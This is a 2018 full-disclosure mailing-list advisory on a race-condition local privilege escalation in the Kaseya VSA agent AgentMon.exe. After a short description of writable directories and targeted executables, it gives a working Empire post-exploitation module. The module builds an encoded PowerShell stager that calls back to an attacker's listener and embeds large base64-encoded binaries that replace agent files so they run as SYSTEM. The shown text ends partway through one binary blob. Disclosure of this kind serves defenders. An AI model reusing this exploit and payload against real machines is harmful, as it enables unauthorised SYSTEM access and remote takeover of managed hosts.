[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Kaseya AgentMon.exe <= 9.3.0.11 - Local Privilege Escalation
From: x ksi <s3810 () pjwstk ! edu ! pl>
Date: 2018-03-22 13:23:49
Message-ID: CAN10O-bVpWsD422Td2ODcxSjaC=QhZgGLcXz1LF09KK=w_4DZg () mail ! gmail ! com
[Download RAW message or body]
Hey,
The Local Privilege Escalation vulnerability was found in the Kaseya
Virtual System Administrator (VSA) [1] agent "AgentMon.exe". The agent is a
Windows service that periodically executes various programs with "NT
AUTHORITY\SYSTEM" privileges.
In the Kaseya's default configuration, Windows users who belong to the
"Authenticated Users" group can modify files residing in the working and
temporary directories e.g.:
- "HKLM\SOFTWARE\Kaseya\Agent\...\TempPath"
- "C:\Temp"
- "C:\kworking"
The list of executables that are stored in these directories and are run by
the agent includes, but is not limited to:
- "C:\kworking\NetUserStateAudit.exe"
- "C:\kworking\KLicense.exe"
- "C:\Temp\kwami.dll"
The VSA agent before running the executables performs verification if the
files were modified. If it detects that was the case, then it restores them
to their known-good originals. However, this process was found to suffer
from a Time of Check & Time of Use (TOCTOU) issue and that it is possible
to win a race condition which makes it possible to run arbitrary
executables with "NT AUTHORITY\SYSTEM" privileges.
The PoC exploiting this vulnerability is included below. The PoC is an
Empire module (https://github.com/EmpireProject/Empire) and it currently
supports exploitation by replacing one of the following files:
- "C:\kworking\NetUserStateAudit.exe" ($exe in PoC)
- "C:\Temp\kwami.dll" ($dll in PoC)
--
$ cat > kaseya.py << EOF
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Kaseya AgentMon.exe <= 9.3.0.11 - Local Privilege Escalation',
'Author': ['Filip.Palian@pjwstk.edu.pl'],
'Description': (
'It\'s possible to exploit TOCTOU vulnerability in Kaseya '
'AgentMon.exe service by winning a race condition when it tries '
'to execute binaries from its working and/or temp folder.'),
'Background': False,
'OutputExtension': None,
'OpsecSafe': False,
'Language' : 'python',
'NeedsAdmin' : False,
'MinLanguageVersion' : '2.6',
'Comments': [
'http://kaseya.com/'
]
}
self.options = {
'Agent': {
'Description' : 'Agent to run on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging ' \
+ 'request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or' \
+ 'other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:' \
+ 'password) to use for request (default,' \
+ 'none, or other).',
'Required' : False,
'Value' : 'default'
},
'Executable': {
'Description' : 'Name of the exacutable to replace in working' \
+ 'folder (default or other).',
'Required' : False,
'Value' : 'default'
},
'Path': {
'Description' : 'Working or temp folder to use (default, work,' \
+ 'temp).',
'Required' : False,
'Value' : 'default'
},
}
self.mainMenu = mainMenu
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
execName = self.options['Executable']['Value']
path = self.options['Path']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
launcher = self.mainMenu.stagers.generate_launcher(
listenerName,
language='powershell',
encode=True,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds
)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
encLauncher = " ".join(launcher.split(" ")[1:])
script = '''
\$exe = "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"
\$dll = "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 \
